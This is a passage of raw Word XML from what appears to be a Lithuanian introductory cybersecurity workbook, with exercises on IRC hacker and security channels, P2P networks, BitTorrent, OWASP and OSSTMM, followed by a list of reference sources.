        <w:t xml:space="preserve">Paaiškinkite, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kaip reikia prisijungti prie HACK kanalo</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, kai jau esate prisijungęs</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">prie tinklo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C002DF" w14:textId="5793B7B0"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Kaip sužinoti</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">koks kanalas </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IRC tinkle? Suraskite tris kibernetinės saugos kanalus ir tris </w:t>
      </w:r>
      <w:r w:rsidR="00BF064E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">programišių (angl. – </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="00BF064E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ker</w:t>
      </w:r>
      <w:r w:rsidR="00BF064E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kanalus. Ar galite įeiti į šiuos kanalus? Ar žmonės</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> juose</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kalbasi</w:t>
      </w:r>
      <w:r w:rsidR="00450391" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00450391" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bendrauja</w:t>
      </w:r>
      <w:r w:rsidR="00450391" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00450391" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>komunikuoja</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, ar jie yra</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tik</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A40AB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">programos-robotai </w:t>
      </w:r>
      <w:r w:rsidR="00450391" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>botai“?</w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Glaustai pakomentuokite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2CA56" w14:textId="6876AF5D"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Suraskite prieinamų P2P tinklų ar</w:t>
      </w:r>
      <w:r w:rsidR="001C0649" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001C0649" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir programinių įrangų, kurios naudoja P2P tinklus</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, sąrašą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F331E" w14:textId="2C3262C5"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 xml:space="preserve">Išnagrinėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>BitTorrent</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> protokolą. K</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okią funkciją jis atlieka</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir kaip p</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>agreitina</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atsi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>siuntimą? Ar tai yra</w:t>
      </w:r>
      <w:r w:rsidR="001C0649" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>saugi“ P2P forma?</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kodėl? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Suraskite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">torrent </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kliento programą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A2C7B" w14:textId="36EB398C"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 xml:space="preserve">Į Google paiešką įveskite žodžius </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Download Ubuntu Torrent</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ar galite parsisiųsti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="009131FA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Linux sis</w:t>
      </w:r>
      <w:r w:rsidR="00A42EA9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">temą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">naudodami </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>torrent</w:t>
      </w:r>
      <w:r w:rsidR="00A42EA9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00790158" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>formato</w:t>
      </w:r>
      <w:r w:rsidR="00A42EA9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> failą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidR="008E4F26" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kokią informaciją atsisiu</w:t>
      </w:r>
      <w:r w:rsidR="00EF0BE0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nčiate</w:t>
      </w:r>
      <w:r w:rsidR="00E41673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> išsaugodami</w:t>
      </w:r>
      <w:r w:rsidR="00FC7EC1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>torrent</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00451D67" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">formato </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>failą?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C1CD1" w14:textId="261B8276"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Kas</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Glaustai pristatykite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šio projekto paskirtį.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242481FE" w14:textId="605DBA75" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kas </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yra OSSTMM</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Glaustai pristatykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>šio projekto paskirtį.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC24FE" w14:textId="1E7B0D63" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00031287" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Glaustai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paaiškinkite, k</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>uo skiriasi OSSTMM nuo OWASP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6FFA8D" w14:textId="77777777" w:rsidR="00C40154" w:rsidRPr="005A5C28" w:rsidRDefault="00C40154" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8D2678" w14:textId="038C7BA4" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F8C208" w14:textId="716A1B14" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="0F7F5190" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Engine Watch. </w:t>
      </w:r>
      <w:r w:rsidR="5EEA3294" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.searchenginewatch.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="597D5750" w14:textId="70270EFA" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="78ECCF1B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Internet Archive.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1D3846F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>on-profit library of millions of free books, movies, software, music, websites, and more.</w:t>
      </w:r>
      <w:r w:rsidR="1D3846F5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44BEDE93" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId89">
        <w:r w:rsidR="44BEDE93" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.archive.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="138FADE2" w14:textId="129FB343" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="4B3B8FF2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>The Open Web Application Security Project.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2731828D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nonprofit foundation that works to improve the security of software</w:t>
      </w:r>
      <w:r w:rsidR="2731828D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="053429BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId90">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://owasp.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ACB5D74" w14:textId="2D857F48" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="5FD15423" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Herzog P. </w:t>
      </w:r>
      <w:r w:rsidR="747D0327" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2010). </w:t>
      </w:r>
      <w:r w:rsidR="0071EBE5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The Open Source Security Testing Methodology Manual. </w:t>
      </w:r>
      <w:r w:rsidR="0B63B1A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ISECOM. </w:t>
      </w:r>
      <w:r w:rsidR="5EEA3294" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId91">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.isecom.org/OSSTMM.3.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FF3D15A" w14:textId="01406FFA" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="3DC2547D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
